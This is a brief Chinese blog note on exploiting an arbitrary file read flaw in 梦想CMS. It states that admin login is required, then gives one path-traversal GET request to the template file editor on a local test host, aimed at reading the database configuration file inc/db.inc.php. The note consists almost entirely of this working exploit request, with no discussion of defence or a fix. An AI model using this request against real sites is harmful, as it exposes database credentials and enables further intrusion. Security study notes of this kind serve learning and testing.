【笔记】梦想CMS任意文件读取漏洞利用 发表于 2024-07-10 更新于 2025-12-26 阅读次数: 前言梦想CMS任意文件读取漏洞利用 漏洞利用前提 可以登录管理员后台 漏洞利用 ../inc/db.inc.php:读取的文件 request1GET http://127.0.0.1/admin.php?m=Template&a=editfile&dir=../inc/db.inc.php 完成